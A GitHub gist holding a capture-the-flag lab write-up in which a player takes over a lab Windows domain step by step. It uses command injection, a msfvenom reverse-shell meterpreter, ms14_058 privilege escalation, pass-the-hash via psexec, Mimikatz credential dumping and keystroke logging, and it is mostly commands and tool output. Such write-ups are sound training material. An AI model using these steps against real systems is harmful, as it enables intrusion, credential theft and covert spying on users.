Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
Write-up des défis : Introduction à la sécurité offensive

Write up

192.168.8.10

http://192.168.8.10
127.0.0.1 | dir

 Volume in drive C has no label.
 Volume Serial Number is A4A0-78D3

 Directory of C:\inetpub\wwwroot

06/10/2016  04:21 PM    
          .
06/10/2016  04:21 PM    
          ..
02/09/2016  03:27 PM               141 flag-c4f8090e8d371207aa47b616552ad66f.txt
02/09/2016  02:50 PM               432 index.php
02/09/2016  04:18 PM             4,884 super_crappy_webshell.php
               3 File(s)          5,457 bytes
               2 Dir(s)   5,981,073,408 bytes free

http://192.168.8.15/flag-c4f8090e8d371207aa47b616552ad66f.txt

FLAG-CommandInjectionAsAService

HINT : Now use the hidden webshell to upload and execute a meterpreter.

Ref : http://netsec.ws/?p=331

http://192.168.8.15/super_crappy_webshell.php

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.8.8 LPORT=1234 -f exe > shell.exe

We can start a reverse shell tcp/handler with metasploit …
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
exploit

use the ms14_058_track_popup_menu with a bind_tcp or reverse
use exploit/windows/local/ms14_058_track_popup_menu
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.8.8

C:\>type flag-admins-only.txt
type flag-admins-only.txt
Flag-LookMomImALocalAdmin!

Ensuite, on fait hashdump pour obtenir les hashs des users

192.168.8.11

use exploit/windows/smb/psexec
set rhost 192.168.8.11
set smbpass aad3b435b51404eeaad3b435b51404ee:d7e233670b66858a436c353b205d4faa
set smbuser it_support
exploit
[*] Started reverse TCP handler on 192.168.8.8:4444 
[*] Connecting to the server...
[*] Authenticating to 192.168.8.11:445 as user 'it_support'...
[*] Selecting PowerShell target
[*] 192.168.8.11:445 - Executing the payload...
[+] 192.168.8.11:445 - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (957487 bytes) to 192.168.8.11
[*] Meterpreter session 2 opened (192.168.8.8:4444 -> 192.168.8.11:50295) at 2016-08-09 14:06:08 -0400
cd /
ls
Listing: C:\
============

Mode              Size        Type  Last modified              Name
----              ----        ----  -------------              ----
40777/rwxrwxrwx   0           dir   2016-02-10 12:03:28 -0500  $Recycle.Bin
40777/rwxrwxrwx   0           dir   2009-07-14 01:08:56 -0400  Documents and Settings
40777/rwxrwxrwx   0           dir   2009-07-13 23:20:08 -0400  PerfLogs
40555/r-xr-xr-x   0           dir   2016-02-09 16:59:44 -0500  Program Files
40555/r-xr-xr-x   0           dir   2009-07-14 00:57:06 -0400  Program Files (x86)
40777/rwxrwxrwx   0           dir   2016-02-10 12:06:17 -0500  ProgramData
40777/rwxrwxrwx   0           dir   2016-02-09 16:31:31 -0500  Recovery
40777/rwxrwxrwx   0           dir   2016-08-09 06:16:10 -0400  System Volume Information
40555/r-xr-xr-x   0           dir   2016-02-10 12:34:05 -0500  Users
40777/rwxrwxrwx   0           dir   2016-08-09 03:39:25 -0400  Windows
40777/rwxrwxrwx   0           dir   2016-02-09 16:33:28 -0500  d678c75c649fe4979f61ee29093de8
100666/rw-rw-rw-  198         fil   2016-02-10 12:32:06 -0500  flag-pass-the-hash.txt
100666/rw-rw-rw-  2147016704  fil   2016-08-09 03:49:56 -0400  pagefile.sys

cat flag-pass-the-hash.txt
Flag-AHashIsAPasswordRight?

Hints: 
Maybe a privileged user did log into this machine to fix an issue. Check in memory, maybe you could find some useful informations... Wink Wink, Mimikatz! 

ps
Process List
============

 PID   PPID  Name                  Arch  Session  User                          Path
 ---   ----  ----                  ----  -------  ----                          ----
 0     0     [System Process]                                                   
 4     0     System                x64   0                                      
 272   4     smss.exe              x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\smss.exe
 300   480   spoolsv.exe           x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\spoolsv.exe
 328   480   svchost.exe           x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\svchost.exe
 336   328   csrss.exe             x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\csrss.exe
 376   368   csrss.exe             x64   1        NT AUTHORITY\SYSTEM           C:\Windows\System32\csrss.exe
 384   328   wininit.exe           x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\wininit.exe
 416   368   winlogon.exe          x64   1        NT AUTHORITY\SYSTEM           C:\Windows\System32\winlogon.exe
 480   384   services.exe          x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\services.exe
 488   384   lsass.exe             x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\lsass.exe
 496   384   lsm.exe               x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\lsm.exe
 560   480   taskhost.exe          x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\taskhost.exe
 588   480   svchost.exe           x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 664   480   svchost.exe           x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\svchost.exe
 736   416   LogonUI.exe           x64   1        NT AUTHORITY\SYSTEM           C:\Windows\System32\LogonUI.exe
 752   480   svchost.exe           x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
 788   480   svchost.exe           x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 812   480   svchost.exe           x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 936   480   svchost.exe           x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
 1048  480   svchost.exe           x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
 1172  480   svchost.exe           x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
 1256  480   msdtc.exe             x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\msdtc.exe
 1264  480   vmtoolsd.exe          x64   0        NT AUTHORITY\SYSTEM           C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
 1624  480   svchost.exe           x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\svchost.exe
 1848  1008  powershell.exe        x86   0        NT AUTHORITY\SYSTEM           C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
 2272  480   svchost.exe           x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 2656  480   SearchIndexer.exe     x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\SearchIndexer.exe
 2684  480   TrustedInstaller.exe  x64   0        NT AUTHORITY\SYSTEM           C:\Windows\servicing\TrustedInstaller.exe
 2736  336   conhost.exe           x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\conhost.exe

migrate 788
[*] Migrating from 1848 to 788...
[*] Migration completed successfully.

load kiwi
creds_all
Domain    User          Password                                                                                                                  LM Hash  NTLM Hash
------    ----          --------                                                                                                                  -------  ---------
YOLOCORP  it_guy        JuvavSecurity2016 

192.168.8.12

use exploit/windows/smb/psexec
set rhost 192.168.8.12
set smbuser it_guy
set smbpassword JuvavSecurity2016
set smbdomain YOLOCORP
exploit

[*] Started reverse TCP handler on 192.168.8.8:4444 
[*] Connecting to the server...
[*] Authenticating to 192.168.8.12:445|YOLOCORP as user 'it_guy'...
[*] Selecting PowerShell target
[*] 192.168.8.12:445 - Executing the payload...
[+] 192.168.8.12:445 - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (957487 bytes) to 192.168.8.12
[*] Meterpreter session 4 opened (192.168.8.8:4444 -> 192.168.8.12:53552) at 2016-08-09 14:16:36 -0400

cd /
ls

Listing: C:\
============

Mode              Size        Type  Last modified              Name
----              ----        ----  -------------              ----
40777/rwxrwxrwx   0           dir   2016-02-10 10:55:21 -0500  $Recycle.Bin
40777/rwxrwxrwx   0           dir   2009-07-14 01:08:56 -0400  Documents and Settings
40777/rwxrwxrwx   0           dir   2009-07-13 23:20:08 -0400  PerfLogs
40555/r-xr-xr-x   0           dir   2016-02-09 16:59:44 -0500  Program Files
40555/r-xr-xr-x   0           dir   2009-07-14 00:57:06 -0400  Program Files (x86)
40777/rwxrwxrwx   0           dir   2016-02-10 11:53:06 -0500  ProgramData
40777/rwxrwxrwx   0           dir   2016-02-09 16:31:31 -0500  Recovery
40777/rwxrwxrwx   0           dir   2016-08-09 06:45:22 -0400  System Volume Information
40555/r-xr-xr-x   0           dir   2016-02-10 12:18:35 -0500  Users
40777/rwxrwxrwx   0           dir   2016-08-09 03:34:45 -0400  Windows
40777/rwxrwxrwx   0           dir   2016-02-09 16:33:28 -0500  d678c75c649fe4979f61ee29093de8
100666/rw-rw-rw-  186         fil   2016-02-11 14:27:50 -0500  flag-it-guy.txt
100666/rw-rw-rw-  2147016704  fil   2016-08-09 03:42:55 -0400  pagefile.sys

cat flag-it-guy.txt
Flag-ITGuy,IGotYourPassword!

Hints: 
Now You should look for the Domain Admin account password : It is not located on this machine.
Maybe IT guy is actively working now.
Maaaybe...

ps
Process List
============

 PID   PPID  Name                    Arch  Session  User                          Path
 ---   ----  ----                    ----  -------  ----                          ----
 0     0     [System Process]                                                     
 4     0     System                  x64   0                                      
 100   500   svchost.exe             x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
 160   408   conhost.exe             x64   1        YOLOCORP\it_guy               C:\Windows\System32\conhost.exe
 224   500   sppsvc.exe              x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\sppsvc.exe
 260   4     smss.exe                x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\smss.exe
 356   348   csrss.exe               x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\csrss.exe
 396   348   wininit.exe             x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\wininit.exe
 408   388   csrss.exe               x64   1        NT AUTHORITY\SYSTEM           C:\Windows\System32\csrss.exe
 444   388   winlogon.exe            x64   1        NT AUTHORITY\SYSTEM           C:\Windows\System32\winlogon.exe
 500   396   services.exe            x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\services.exe
 516   396   lsass.exe               x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\lsass.exe
 524   396   lsm.exe                 x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\lsm.exe
 580   500   svchost.exe             x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\svchost.exe
 628   500   svchost.exe             x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 700   500   svchost.exe             x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\svchost.exe
 708   1016  SearchFilterHost.exe    x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\SearchFilterHost.exe
 804   500   msdtc.exe               x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\msdtc.exe
 808   500   svchost.exe             x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
 844   500   svchost.exe             x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 884   500   svchost.exe             x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 984   884   wuauclt.exe             x64   1        YOLOCORP\it_guy               C:\Windows\System32\wuauclt.exe
 1016  500   SearchIndexer.exe       x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\SearchIndexer.exe
 1092  500   spoolsv.exe             x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\spoolsv.exe
 1124  500   svchost.exe             x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
 1164  500   taskhost.exe            x64   1        YOLOCORP\it_guy               C:\Windows\System32\taskhost.exe
 1252  500   svchost.exe             x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
 1356  500   vmtoolsd.exe            x64   0        NT AUTHORITY\SYSTEM           C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
 1388  1816  mstsc.exe               x64   1        YOLOCORP\it_guy               C:\Windows\System32\mstsc.exe
 1700  500   svchost.exe             x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\svchost.exe
 1736  844   dwm.exe                 x64   1        YOLOCORP\it_guy               C:\Windows\System32\dwm.exe
 1776  628   WmiPrvSE.exe            x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\wbem\WmiPrvSE.exe
 1792  500   TrustedInstaller.exe    x64   0        NT AUTHORITY\SYSTEM           C:\Windows\servicing\TrustedInstaller.exe
 1816  1868  explorer.exe            x64   1        YOLOCORP\it_guy               C:\Windows\explorer.exe
 1980  2304  powershell.exe          x86   0        NT AUTHORITY\SYSTEM           C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
 1988  500   dllhost.exe             x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\dllhost.exe
 2052  1016  SearchProtocolHost.exe  x64   1        YOLOCORP\it_guy               C:\Windows\System32\SearchProtocolHost.exe
 2192  356   conhost.exe             x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\conhost.exe
 2228  2252  IT_Guy_Simulator.exe    x64   1        YOLOCORP\it_guy               C:\Users\it_guy\Desktop\IT_Guy_Simulator.exe
 2252  884   taskeng.exe             x64   1        YOLOCORP\it_guy               C:\Windows\System32\taskeng.exe
 2576  1816  vmtoolsd.exe            x64   1        YOLOCORP\it_guy               C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
 2676  1016  SearchProtocolHost.exe  x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\SearchProtocolHost.exe
 2716  500   svchost.exe             x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe

migrate 1816
keyscan_start
keyscan_dump
Dumping captured keystrokes...
app <CapsLock> s <CapsLock> erver  <CapsLock> a <CapsLock> dministrator <Tab>  <CapsLock> s <CapsLock> uper <CapsLock> 
d <CapsLock> umb <CapsLock> p <CapsLock> assword1234 <Return>  <LWin> mstsc <Return> 192.168.8.13 <Return> app <CapsLock> 
s <CapsLock> erver  <CapsLock> a <CapsLock> dministrator <Tab>  <CapsLock> s <CapsLock> uper <CapsLock> d <CapsLock> umb 
<CapsLock> p <CapsLock> assword1234 <Return>  <LWin> mstsc <Return> 192.168.8.13 <Return> app <CapsLock> s <CapsLock> 
erver  <CapsLock> a <CapsLock> dministrator <Tab>  <CapsLock> s <CapsLock> uper <CapsLock> d <CapsLock> umb <CapsLock> p 
<CapsLock> assword12

// 192.168.8.13 APPSERVER\Administrator SuperDumbPassword1234

192.168.8.13

###Command

use exploit/windows/smb/psexec
set rhost 192.168.8.13
set smbuser Administrator
set smbpass SuperDumbPassword1234
set smbdomain APPSERVER
exloit
[*] Started reverse TCP handler on 192.168.8.8:4444 
[*] Connecting to the server...
[*] Authenticating to 192.168.8.13:445|APPSERVER as user 'Administrator'...
[*] Selecting PowerShell target
[*] 192.168.8.13:445 - Executing the payload...
[+] 192.168.8.13:445 - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (957487 bytes) to 192.168.8.13
[*] Meterpreter session 6 opened (192.168.8.8:4444 -> 192.168.8.13:49679) at 2016-08-09 14:28:31 -0400

cd /
ls

Listing: C:\
============

Mode              Size        Type  Last modified              Name
----              ----        ----  -------------              ----
40777/rwxrwxrwx   0           dir   2009-07-13 22:34:39 -0400  $Recycle.Bin
40777/rwxrwxrwx   0           dir   2009-07-14 01:06:44 -0400  Documents and Settings
40777/rwxrwxrwx   0           dir   2009-07-13 23:20:08 -0400  PerfLogs
40555/r-xr-xr-x   0           dir   2016-07-25 14:33:21 -0400  Program Files
40555/r-xr-xr-x   0           dir   2009-07-14 01:06:53 -0400  Program Files (x86)
40777/rwxrwxrwx   0           dir   2016-07-25 14:33:21 -0400  ProgramData
40777/rwxrwxrwx   0           dir   2016-02-10 21:05:52 -0500  Recovery
40777/rwxrwxrwx   0           dir   2016-02-10 21:03:57 -0500  System Volume Information
40555/r-xr-xr-x   0           dir   2016-02-11 13:42:46 -0500  Users
40777/rwxrwxrwx   0           dir   2016-07-25 14:31:16 -0400  Windows
100666/rw-rw-rw-  133         fil   2016-02-11 14:19:21 -0500  flag.txt
100666/rw-rw-rw-  4294500352  fil   2016-07-25 14:35:01 -0400  pagefile.sys

cat flag.txt
Flag-SpyingOnUsersIsBad

Hint: The Domain administrator is connected to this machine. His password will be somewhere in memory...

ps
Process List
============

 PID   PPID  Name                  Arch  Session  User                          Path
 ---   ----  ----                  ----  -------  ----                          ----
 0     0     [System Process]                                                   
 4     0     System                x64   0                                      
 228   4     smss.exe              x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\smss.exe
 248   476   svchost.exe           x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
 320   312   csrss.exe             x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\csrss.exe
 336   320   conhost.exe           x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\conhost.exe
 372   364   csrss.exe             x64   1        NT AUTHORITY\SYSTEM           C:\Windows\System32\csrss.exe
 380   312   wininit.exe           x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\wininit.exe
 416   364   winlogon.exe          x64   1        NT AUTHORITY\SYSTEM           C:\Windows\System32\winlogon.exe
 476   380   services.exe          x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\services.exe
 492   380   lsass.exe             x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\lsass.exe
 504   380   lsm.exe               x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\lsm.exe
 604   476   svchost.exe           x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 680   476   svchost.exe           x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\svchost.exe
 764   476   svchost.exe           x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
 804   476   svchost.exe           x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 848   476   svchost.exe           x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
 888   476   svchost.exe           x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 932   476   svchost.exe           x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\svchost.exe
 1032  476   spoolsv.exe           x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\spoolsv.exe
 1112  476   svchost.exe           x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
 1152  604   WmiPrvSE.exe          x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\wbem\WmiPrvSE.exe
 1172  476   VGAuthService.exe     x64   0        NT AUTHORITY\SYSTEM           C:\Program Files\VMware\VMware Tools\VMware VGAuth\VGAuthService.exe
 1232  476   vmtoolsd.exe          x64   0        NT AUTHORITY\SYSTEM           C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
 1284  2516  powershell.exe        x86   0        NT AUTHORITY\SYSTEM           C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
 1436  476   svchost.exe           x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\svchost.exe
 1576  476   taskhost.exe          x64   1        YOLOCORP\Administrator        C:\Windows\System32\taskhost.exe
 1616  476   svchost.exe           x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\svchost.exe
 1652  476   svchost.exe           x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 1680  476   sppsvc.exe            x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\sppsvc.exe
 1720  476   dllhost.exe           x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\dllhost.exe
 1816  476   msdtc.exe             x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\msdtc.exe
 1928  1284  notepad.exe           x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\notepad.exe
 2020  604   WmiPrvSE.exe          x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\wbem\WmiPrvSE.exe
 2120  888   dwm.exe               x64   1        YOLOCORP\Administrator        C:\Windows\System32\dwm.exe
 2144  2104  explorer.exe          x64   1        YOLOCORP\Administrator        C:\Windows\explorer.exe
 2396  2144  vmtoolsd.exe          x64   1        YOLOCORP\Administrator        C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
 2700  476   TrustedInstaller.exe  x64   0        NT AUTHORITY\SYSTEM           C:\Windows\servicing\TrustedInstaller.exe
 2780  476   WmiApSrv.exe          x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\wbem\WmiApSrv.exe
 3044  476   svchost.exe           x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe

migrate 416
[*] Migrating from 1284 to 416...
[*] Migration completed successfully.

load kiwi
creds_all

Domain    User           Password                                                                                                                  LM Hash  NTLM Hash
------    ----           --------                                                                                                                  -------  ---------
YOLOCORP  Administrator  MegaSecurePassword1337   

192.168.8.1

###Command

msfconsole
use exploit/windows/smb/psexec
set rhost 192.168.8.1
set smbuser Administrator
set smbpass MegaSecurePassword1337
set smbdomain YOLOCORP
exploit

[*] Started reverse TCP handler on 192.168.8.8:4444 
[*] Connecting to the server...
[*] Authenticating to 192.168.8.1:445|YOLOCORP as user 'Administrator'...
[*] Selecting PowerShell target
[*] 192.168.8.1:445 - Executing the payload...
[+] 192.168.8.1:445 - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (957487 bytes) to 192.168.8.1
[*] Meterpreter session 1 opened (192.168.8.8:4444 -> 192.168.8.1:52457) at 2016-08-09 14:58:13 -0400

cd /
ls

Listing: C:\
============

Mode              Size        Type  Last modified              Name
----              ----        ----  -------------              ----
40777/rwxrwxrwx   0           dir   2009-07-13 22:34:39 -0400  $Recycle.Bin
40777/rwxrwxrwx   0           dir   2009-07-14 01:06:44 -0400  Documents and Settings
40777/rwxrwxrwx   0           dir   2009-07-13 23:20:08 -0400  PerfLogs
40555/r-xr-xr-x   0           dir   2016-02-09 12:27:32 -0500  Program Files
40555/r-xr-xr-x   0           dir   2016-02-09 12:27:33 -0500  Program Files (x86)
40777/rwxrwxrwx   0           dir   2016-02-10 10:49:07 -0500  ProgramData
40777/rwxrwxrwx   0           dir   2016-02-09 19:21:42 -0500  Recovery
40777/rwxrwxrwx   0           dir   2016-02-09 12:28:04 -0500  System Volume Information
40555/r-xr-xr-x   0           dir   2016-02-09 19:24:03 -0500  Users
40777/rwxrwxrwx   0           dir   2016-06-08 09:49:12 -0400  Windows
100666/rw-rw-rw-  29          fil   2016-06-08 12:44:42 -0400  flag.txt.txt
100666/rw-rw-rw-  4294500352  fil   2016-08-08 15:25:11 -0400  pagefile.sys

cat flag.txt

FLAG-G00dJ0bY0uG0tTh3L4stFl4g
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.